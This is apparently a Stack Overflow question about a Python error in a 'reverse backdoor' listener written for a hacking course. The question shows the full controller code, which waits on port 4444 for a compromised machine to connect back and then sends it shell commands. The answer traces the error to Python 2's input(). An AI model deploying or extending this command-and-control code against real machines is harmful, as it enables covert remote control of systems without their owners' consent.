# AttributeError: 'builtin_function_or_method' object has no attribute 'split' - reverseback door

Tags: python, windows, sockets, tcp

I am making a reverse backdoor using the Udemy course by Zaid
Somehow I am coming across this error, [Erorr image](https://i.stack.imgur.com/pwPud.jpg)  please tell me how to solve is

Regards,
Aryan vir

The code for the backdoor

```
import socket , json


class Listner:
    def __init__(self,ip,port):
        listner = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listner.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listner.bind((ip,port))
        print("[+] Waiting for incoming connections")
        listner.listen(0)
        self.connection ,address = listner.accept()
        print("[+] Got a connection form" + str(address))
  
    def reliable_send(self,data):
        json_data = json.dumps(data)
        self.connection.send(json_data.encode('utf-8')) 

    def reliable_recv(self):
        json_data = ""
        while True:
            try: 
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remote(self,command):
        self.reliable_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
        
        return self.reliable_recv()
 
    def run(self):
        while True:
            command = input(">> ")
            command = command.split(" ")
            result = self.execute_remote(command)
            print(result)

mylistner = Listner("172.21.38.172",4444)
mylistner.run()
```

Comment: Old Python version (2)?

Comment: Is it python 2 or 3, and what did you type in?

Comment: i am using python 3

Answer (score 0):

> Old Python version (2)? –
> Klaus D.

> i am using python 3 –
> aryan vir

Klaus D. is right; you are mistaken. After you input `dir` into `command`, `command.split(" ")` yielding

```
AttributeError: 'builtin_function_or_method' object has no attribute 'split'
```

unequivocally indicates that you were using Python 2, where [`input()`](https://docs.python.org/2/library/functions.html#input) is *Equivalent to `eval(raw_input())`.*  You can verify the version 2 with

```
import sys
print sys.version
```

You get the same error when you write `dir.split(" ")` in Python 2.

If you want to continue using Python 2, you can use [`raw_input()`](https://docs.python.org/2/library/functions.html#raw_input) or quote all your input strings.